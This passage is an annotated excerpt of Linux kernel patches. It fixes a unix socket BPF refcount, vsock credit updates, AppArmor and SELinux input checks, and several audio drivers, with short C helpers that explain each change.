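	return (find_active && is_active) ||
	       (!find_active && !is_active);
	/* ... which is simply: find_active == is_active */
}
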
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index 7ea7c3a0d0d06..bd84785bf8d6c 100644
+--- a/net/unix/unix_bpf.c
++++ b/net/unix/unix_bpf.c
+@@ -161,15 +161,30 @@ int unix_stream_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool r
+ {
+ 	struct sock *sk_pair;
+ 
++	/* Restore does not decrement the sk_pair reference yet because we must
++	 * keep a reference to the socket until after an RCU grace period
++	 * and any pending sends have completed.
++	 */
+ 	if (restore) {
+ 		sk->sk_write_space = psock->saved_write_space;
+ 		sock_replace_proto(sk, psock->sk_proto);
+ 		return 0;
+ 	}
+ 
+-	sk_pair = unix_peer(sk);
+-	sock_hold(sk_pair);
+-	psock->sk_pair = sk_pair;
++	/* psock_update_sk_prot can be called multiple times if psock is
++	 * added to multiple maps and/or slots in the same map. There is
++	 * also an edge case where replacing a psock with itself can trigger
++	 * an extra psock_update_sk_prot during the insert process. So it
++	 * must be safe to do multiple calls. Here we need to ensure we don't
++	 * increment the refcnt through sock_hold many times. There will only
++	 * be a single matching destroy operation.
++	 */
++	if (!psock->sk_pair) {
++		sk_pair = unix_peer(sk);
++		sock_hold(sk_pair);
++		psock->sk_pair = sk_pair;
++	}
++
+ 	unix_stream_bpf_check_needs_rebuild(psock->sk_proto);
+ 	sock_replace_proto(sk, &unix_stream_bpf_prot);
+ 	return 0;
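
The guard added above makes the reference-taking idempotent: update_proto can run several times for one psock (insertion into several maps, or replacing a psock with itself), yet there is exactly one destroy, so sock_hold() on the peer must happen only once. The pattern with stand-in types:

struct peer { int refcnt; };
struct psock { struct peer *sk_pair; };

static void peer_hold(struct peer *p)
{
	p->refcnt++;
}

static void psock_update(struct psock *psock, struct peer *peer)
{
	if (!psock->sk_pair) {	/* first update only */
		peer_hold(peer);
		psock->sk_pair = peer;
	}
	/* later updates are no-ops for the reference count */
}
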
+diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
+index 2e25890ca52d1..9983b833b55d8 100644
+--- a/net/vmw_vsock/virtio_transport_common.c
++++ b/net/vmw_vsock/virtio_transport_common.c
+@@ -366,6 +366,8 @@ virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+ 	size_t bytes, total = 0;
+ 	struct sk_buff *skb;
++	u32 fwd_cnt_delta;
++	bool low_rx_bytes;
+ 	int err = -EFAULT;
+ 	u32 free_space;
+ 
+@@ -400,7 +402,10 @@ virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
+ 		}
+ 	}
+ 
+-	free_space = vvs->buf_alloc - (vvs->fwd_cnt - vvs->last_fwd_cnt);
++	fwd_cnt_delta = vvs->fwd_cnt - vvs->last_fwd_cnt;
++	free_space = vvs->buf_alloc - fwd_cnt_delta;
++	low_rx_bytes = (vvs->rx_bytes <
++			sock_rcvlowat(sk_vsock(vsk), 0, INT_MAX));
+ 
+ 	spin_unlock_bh(&vvs->rx_lock);
+ 
+@@ -410,9 +415,11 @@ virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
+ 	 * too high causes extra messages. Too low causes transmitter
+ 	 * stalls. As stalls are in theory more expensive than extra
+ 	 * messages, we set the limit to a high value. TODO: experiment
+-	 * with different values.
++	 * with different values. Also send credit update message when
++	 * number of bytes in rx queue is not enough to wake up reader.
+ 	 */
+-	if (free_space < VIRTIO_VSOCK_MAX_PKT_BUF_SIZE)
++	if (fwd_cnt_delta &&
++	    (free_space < VIRTIO_VSOCK_MAX_PKT_BUF_SIZE || low_rx_bytes))
+ 		virtio_transport_send_credit_update(vsk);
+ 
+ 	return total;
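
After this change a credit update goes out only when the peer's view of the buffer is actually stale (fwd_cnt_delta non-zero) and either free space fell below the threshold or the rx queue holds fewer bytes than the reader's SO_RCVLOWAT needs to make progress. The decision isolated into a pure function with simplified names:

#include <stdbool.h>
#include <stdint.h>

#define MAX_PKT_BUF_SIZE	(1024U * 64U)	/* as in the vsock header */

static bool need_credit_update(uint32_t buf_alloc, uint32_t fwd_cnt,
			       uint32_t last_fwd_cnt, uint32_t rx_bytes,
			       uint32_t rcvlowat)
{
	uint32_t fwd_cnt_delta = fwd_cnt - last_fwd_cnt;
	uint32_t free_space = buf_alloc - fwd_cnt_delta;
	bool low_rx_bytes = rx_bytes < rcvlowat;

	return fwd_cnt_delta &&
	       (free_space < MAX_PKT_BUF_SIZE || low_rx_bytes);
}
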
+diff --git a/scripts/Makefile.compiler b/scripts/Makefile.compiler
+index 158c57f2acfde..87589a7ba27f3 100644
+--- a/scripts/Makefile.compiler
++++ b/scripts/Makefile.compiler
+@@ -72,7 +72,3 @@ clang-min-version = $(shell [ $(CONFIG_CLANG_VERSION)0 -ge $(1)0 ] && echo y)
+ # ld-option
+ # Usage: KBUILD_LDFLAGS += $(call ld-option, -X, -Y)
+ ld-option = $(call try-run, $(LD) $(KBUILD_LDFLAGS) $(1) -v,$(1),$(2),$(3))
+-
+-# ld-ifversion
+-# Usage:  $(call ld-ifversion, -ge, 22252, y)
+-ld-ifversion = $(shell [ $(CONFIG_LD_VERSION)0 $(1) $(2)0 ] && echo $(3) || echo $(4))
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 7012fd82f1bb1..633e778ec3692 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -674,6 +674,10 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 
+ 	tmpname = aa_splitn_fqname(name, strlen(name), &tmpns, &ns_len);
+ 	if (tmpns) {
++		if (!tmpname) {
++			info = "empty profile name";
++			goto fail;
++		}
+ 		*ns_name = kstrndup(tmpns, ns_len, GFP_KERNEL);
+ 		if (!*ns_name) {
+ 			info = "out of memory";
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index d88c399b0e86b..d45e9fa74e62d 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -4690,6 +4690,13 @@ static int selinux_socket_bind(struct socket *sock, struct sockaddr *address, in
+ 				return -EINVAL;
+ 			addr4 = (struct sockaddr_in *)address;
+ 			if (family_sa == AF_UNSPEC) {
++				if (family == PF_INET6) {
++					/* Length check from inet6_bind_sk() */
++					if (addrlen < SIN6_LEN_RFC2133)
++						return -EINVAL;
++					/* Family check from __inet6_bind() */
++					goto err_af;
++				}
+ 				/* see __inet_bind(), we only want to allow
+ 				 * AF_UNSPEC if the address is INADDR_ANY
+ 				 */
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 5efb3adee48d9..62f2137044923 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9626,6 +9626,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x87f5, "HP", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87f6, "HP Spectre x360 14", ALC245_FIXUP_HP_X360_AMP),
+ 	SND_PCI_QUIRK(0x103c, 0x87f7, "HP Spectre x360 14", ALC245_FIXUP_HP_X360_AMP),
++	SND_PCI_QUIRK(0x103c, 0x87fe, "HP Laptop 15s-fq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8805, "HP ProBook 650 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x880d, "HP EliteBook 830 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8811, "HP Spectre x360 15-eb1xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+@@ -9720,6 +9721,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c97, "HP ZBook", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca4, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca7, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8cf5, "HP ZBook Studio 16", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+@@ -9978,6 +9980,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3176, "ThinkCentre Station", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3178, "ThinkCentre Station", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x31af, "ThinkCentre Station", ALC623_FIXUP_LENOVO_THINKSTATION_P340),
++	SND_PCI_QUIRK(0x17aa, 0x334b, "Lenovo ThinkCentre M70 Gen5", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3801, "Lenovo Yoga9 14IAP7", ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3802, "Lenovo Yoga DuetITL 2021", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3813, "Legion 7i 15IMHG05", ALC287_FIXUP_LEGION_15IMHG05_SPEAKERS),
+diff --git a/sound/pci/oxygen/oxygen_mixer.c b/sound/pci/oxygen/oxygen_mixer.c
+index 46705ec77b481..eb3aca16359c5 100644
+--- a/sound/pci/oxygen/oxygen_mixer.c
++++ b/sound/pci/oxygen/oxygen_mixer.c
+@@ -718,7 +718,7 @@ static int ac97_fp_rec_volume_put(struct snd_kcontrol *ctl,
+ 	oldreg = oxygen_read_ac97(chip, 1, AC97_REC_GAIN);
+ 	newreg = oldreg & ~0x0707;
+ 	newreg = newreg | (value->value.integer.value[0] & 7);
+-	newreg = newreg | ((value->value.integer.value[0] & 7) << 8);
++	newreg = newreg | ((value->value.integer.value[1] & 7) << 8);
+ 	change = newreg != oldreg;
+ 	if (change)
+ 		oxygen_write_ac97(chip, 1, AC97_REC_GAIN, newreg);
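
The one-line oxygen fix is about register layout: AC97_REC_GAIN carries the left channel's 3-bit gain in bits 0..2 and the right channel's in bits 8..10, so a stereo put must take the high byte from value[1] rather than duplicating value[0]. As a small helper:

#include <stdint.h>

static uint16_t pack_rec_gain(uint16_t oldreg, long left, long right)
{
	uint16_t newreg = oldreg & ~0x0707;

	newreg |= left & 7;		/* bits 0..2: left channel   */
	newreg |= (right & 7) << 8;	/* bits 8..10: right channel */
	return newreg;
}
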
+diff --git a/sound/soc/codecs/cs35l33.c b/sound/soc/codecs/cs35l33.c
+index 15e79168d256e..c3b7046fd29ba 100644
+--- a/sound/soc/codecs/cs35l33.c
++++ b/sound/soc/codecs/cs35l33.c
+@@ -22,13 +22,11 @@
+ #include <sound/soc-dapm.h>
+ #include <sound/initval.h>
+ #include <sound/tlv.h>
+-#include <linux/gpio.h>
+ #include <linux/gpio/consumer.h>
+ #include <sound/cs35l33.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/regulator/machine.h>
+-#include <linux/of_gpio.h>
+ #include <linux/of.h>
+ #include <linux/of_device.h>
+ #include <linux/of_irq.h>
+@@ -1167,7 +1165,7 @@ static int cs35l33_i2c_probe(struct i2c_client *i2c_client)
+ 
+ 	/* We could issue !RST or skip it based on AMP topology */
+ 	cs35l33->reset_gpio = devm_gpiod_get_optional(&i2c_client->dev,
+-			"reset-gpios", GPIOD_OUT_HIGH);
++			"reset", GPIOD_OUT_HIGH);
+ 	if (IS_ERR(cs35l33->reset_gpio)) {
+ 		dev_err(&i2c_client->dev, "%s ERROR: Can't get reset GPIO\n",
+ 			__func__);
+diff --git a/sound/soc/codecs/cs35l34.c b/sound/soc/codecs/cs35l34.c
+index b3f98023e6a75..57d125c03fad0 100644
+--- a/sound/soc/codecs/cs35l34.c
++++ b/sound/soc/codecs/cs35l34.c
+@@ -20,14 +20,12 @@
+ #include <linux/regulator/machine.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/of_device.h>
+-#include <linux/of_gpio.h>
+ #include <linux/of_irq.h>
+ #include <sound/core.h>
+ #include <sound/pcm.h>
+ #include <sound/pcm_params.h>
+ #include <sound/soc.h>
+ #include <sound/soc-dapm.h>
+-#include <linux/gpio.h>
+ #include <linux/gpio/consumer.h>
+ #include <sound/initval.h>
+ #include <sound/tlv.h>
+@@ -1061,7 +1059,7 @@ static int cs35l34_i2c_probe(struct i2c_client *i2c_client)
+ 		dev_err(&i2c_client->dev, "Failed to request IRQ: %d\n", ret);
+ 
+ 	cs35l34->reset_gpio = devm_gpiod_get_optional(&i2c_client->dev,
+-				"reset-gpios", GPIOD_OUT_LOW);
++				"reset", GPIOD_OUT_LOW);
+ 	if (IS_ERR(cs35l34->reset_gpio)) {
+ 		ret = PTR_ERR(cs35l34->reset_gpio);
+ 		goto err_regulator;
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index 60518ee5a86e7..fd3dca08460ba 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -3827,14 +3827,6 @@ static const struct dmi_system_id dmi_platform_data[] = {
+ 		},
+ 		.driver_data = (void *)&ecs_ef20_platform_data,
+ 	},
+-	{
+-		.ident = "EF20EA",
+-		.callback = cht_rt5645_ef20_quirk_cb,
+-		.matches = {
+-			DMI_MATCH(DMI_PRODUCT_NAME, "EF20EA"),
+-		},
+-		.driver_data = (void *)&ecs_ef20_platform_data,
+-	},
+ 	{ }
+ };
+ 
+diff --git a/sound/soc/intel/common/soc-acpi-intel-glk-match.c b/sound/soc/intel/common/soc-acpi-intel-glk-match.c
+index 387e731008841..8911c90bbaf68 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-glk-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-glk-match.c
+@@ -19,6 +19,11 @@ static const struct snd_soc_acpi_codecs glk_codecs = {
+ 	.codecs = {"MX98357A"}
+ };
+ 
++static const struct snd_soc_acpi_codecs glk_rt5682_rt5682s_hp = {
++	.num_codecs = 2,
++	.codecs = {"10EC5682", "RTL5682"},
++};
++
+ struct snd_soc_acpi_mach snd_soc_acpi_intel_glk_machines[] = {
+ 	{
+ 		.id = "INT343A",
+@@ -35,20 +40,13 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_glk_machines[] = {
+ 		.sof_tplg_filename = "sof-glk-da7219.tplg",
+ 	},
+ 	{
+-		.id = "10EC5682",
++		.comp_ids = &glk_rt5682_rt5682s_hp,
+ 		.drv_name = "glk_rt5682_mx98357a",
+ 		.fw_filename = "intel/dsp_fw_glk.bin",
+ 		.machine_quirk = snd_soc_acpi_codec_list,
+ 		.quirk_data = &glk_codecs,
+ 		.sof_tplg_filename = "sof-glk-rt5682.tplg",
+ 	},
+-	{
+-		.id = "RTL5682",
+-		.drv_name = "glk_rt5682_max98357a",
+-		.machine_quirk = snd_soc_acpi_codec_list,
+-		.quirk_data = &glk_codecs,
+-		.sof_tplg_filename = "sof-glk-rt5682.tplg",
+-	},
+ 	{
+ 		.id = "10134242",
+ 		.drv_name = "glk_cs4242_mx98357a",
+diff --git a/sound/soc/mediatek/common/mtk-dsp-sof-common.c b/sound/soc/mediatek/common/mtk-dsp-sof-common.c
+index 8b1b623207bee..d4d1d3b9572a7 100644
+--- a/sound/soc/mediatek/common/mtk-dsp-sof-common.c
++++ b/sound/soc/mediatek/common/mtk-dsp-sof-common.c
+@@ -24,7 +24,7 @@ int mtk_sof_dai_link_fixup(struct snd_soc_pcm_runtime *rtd,
+ 		struct snd_soc_dai_link *sof_dai_link = NULL;
+ 		const struct sof_conn_stream *conn = &sof_priv->conn_streams[i];
+ 
+-		if (strcmp(rtd->dai_link->name, conn->normal_link))
++		if (conn->normal_link && strcmp(rtd->dai_link->name, conn->normal_link))
+ 			continue;
+ 
+ 		for_each_card_rtds(card, runtime) {
+diff --git a/sound/usb/mixer_scarlett_gen2.c b/sound/usb/mixer_scarlett_gen2.c
+index 9d11bb08667e7..1bcb05c73e0ad 100644
+--- a/sound/usb/mixer_scarlett_gen2.c
++++ b/sound/usb/mixer_scarlett_gen2.c
+@@ -1337,9 +1337,11 @@ static void scarlett2_config_save(struct usb_mixer_interface *mixer)
+ {
+ 	__le32 req = cpu_to_le32(SCARLETT2_USB_CONFIG_SAVE);
+ 
+-	scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
+-		      &req, sizeof(u32),
+-		      NULL, 0);
++	int err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
++				&req, sizeof(u32),
++				NULL, 0);
++	if (err < 0)
++		usb_audio_err(mixer->chip, "config save failed: %d\n", err);
+ }
+ 
+ /* Delayed work to save config */
+@@ -1388,7 +1390,10 @@ static int scarlett2_usb_set_config(
+ 		size = 1;
+ 		offset = config_item->offset;
+ 
+-		scarlett2_usb_get(mixer, offset, &tmp, 1);
++		err = scarlett2_usb_get(mixer, offset, &tmp, 1);
++		if (err < 0)
++			return err;
++
+ 		if (value)
+ 			tmp |= (1 << index);
+ 		else
+@@ -1793,14 +1798,20 @@ static int scarlett2_sync_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->sync_updated)
+-		scarlett2_update_sync(mixer);
++
++	if (private->sync_updated) {
++		err = scarlett2_update_sync(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->sync;
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static const struct snd_kcontrol_new scarlett2_sync_ctl = {
+@@ -1883,22 +1894,35 @@ static int scarlett2_master_volume_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->vol_updated)
+-		scarlett2_update_volumes(mixer);
+-	mutex_unlock(&private->data_mutex);
+ 
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->master_vol;
+-	return 0;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int line_out_remap(struct scarlett2_data *private, int index)
+ {
+ 	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int line_out_count =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+ 
+ 	if (!info->line_out_remap_enable)
+ 		return index;
++
++	if (index >= line_out_count)
++		return index;
++
+ 	return info->line_out_remap[index];
+ }
+ 
+@@ -1909,14 +1933,20 @@ static int scarlett2_volume_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
+ 	int index = line_out_remap(private, elem->control);
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->vol_updated)
+-		scarlett2_update_volumes(mixer);
+-	mutex_unlock(&private->data_mutex);
+ 
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->vol[index];
+-	return 0;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_volume_ctl_put(struct snd_kcontrol *kctl,
+@@ -1983,14 +2013,20 @@ static int scarlett2_mute_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
+ 	int index = line_out_remap(private, elem->control);
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->vol_updated)
+-		scarlett2_update_volumes(mixer);
+-	mutex_unlock(&private->data_mutex);
+ 
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->mute_switch[index];
+-	return 0;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_mute_ctl_put(struct snd_kcontrol *kctl,
+@@ -2236,14 +2272,20 @@ static int scarlett2_level_enum_ctl_get(struct snd_kcontrol *kctl,
+ 	const struct scarlett2_device_info *info = private->info;
+ 
+ 	int index = elem->control + info->level_input_first;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->input_other_updated)
+-		scarlett2_update_input_other(mixer);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->level_switch[index];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_level_enum_ctl_put(struct snd_kcontrol *kctl,
+@@ -2294,15 +2336,21 @@ static int scarlett2_pad_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->input_other_updated)
+-		scarlett2_update_input_other(mixer);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] =
+ 		private->pad_switch[elem->control];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_pad_ctl_put(struct snd_kcontrol *kctl,
+@@ -2352,14 +2400,20 @@ static int scarlett2_air_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->input_other_updated)
+-		scarlett2_update_input_other(mixer);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->air_switch[elem->control];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_air_ctl_put(struct snd_kcontrol *kctl,
+@@ -2409,15 +2463,21 @@ static int scarlett2_phantom_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->input_other_updated)
+-		scarlett2_update_input_other(mixer);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] =
+ 		private->phantom_switch[elem->control];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_phantom_ctl_put(struct snd_kcontrol *kctl,
+@@ -2589,14 +2649,20 @@ static int scarlett2_direct_monitor_ctl_get(
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = elem->head.mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->monitor_other_updated)
+-		scarlett2_update_monitor_other(mixer);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->direct_monitor_switch;
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_direct_monitor_ctl_put(
+@@ -2696,14 +2762,20 @@ static int scarlett2_speaker_switch_enum_ctl_get(
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->monitor_other_updated)
+-		scarlett2_update_monitor_other(mixer);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->speaker_switching_switch;
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ /* when speaker switching gets enabled, switch the main/alt speakers
+@@ -2851,14 +2923,20 @@ static int scarlett2_talkback_enum_ctl_get(
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->monitor_other_updated)
+-		scarlett2_update_monitor_other(mixer);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->talkback_switch;
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_talkback_enum_ctl_put(
+@@ -3006,14 +3084,20 @@ static int scarlett2_dim_mute_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->vol_updated)
+-		scarlett2_update_volumes(mixer);
+-	mutex_unlock(&private->data_mutex);
+ 
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->dim_mute[elem->control];
+-	return 0;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_dim_mute_ctl_put(struct snd_kcontrol *kctl,
+@@ -3277,7 +3361,8 @@ static int scarlett2_mixer_ctl_put(struct snd_kcontrol *kctl,
+ 	mutex_lock(&private->data_mutex);
+ 
+ 	oval = private->mix[index];
+-	val = ucontrol->value.integer.value[0];
++	val = clamp(ucontrol->value.integer.value[0],
++		    0L, (long)SCARLETT2_MIXER_MAX_VALUE);
+ 	num_mixer_in = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+ 	mix_num = index / num_mixer_in;
+ 
+@@ -3383,22 +3468,21 @@ static int scarlett2_mux_src_enum_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int line_out_count =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int index = elem->control;
+-
+-	if (index < line_out_count)
+-		index = line_out_remap(private, index);
++	int index = line_out_remap(private, elem->control);
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->mux_updated)
+-		scarlett2_usb_get_mux(mixer);
++
++	if (private->mux_updated) {
++		err = scarlett2_usb_get_mux(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->mux[index];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_mux_src_enum_ctl_put(struct snd_kcontrol *kctl,
+@@ -3407,16 +3491,9 @@ static int scarlett2_mux_src_enum_ctl_put(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
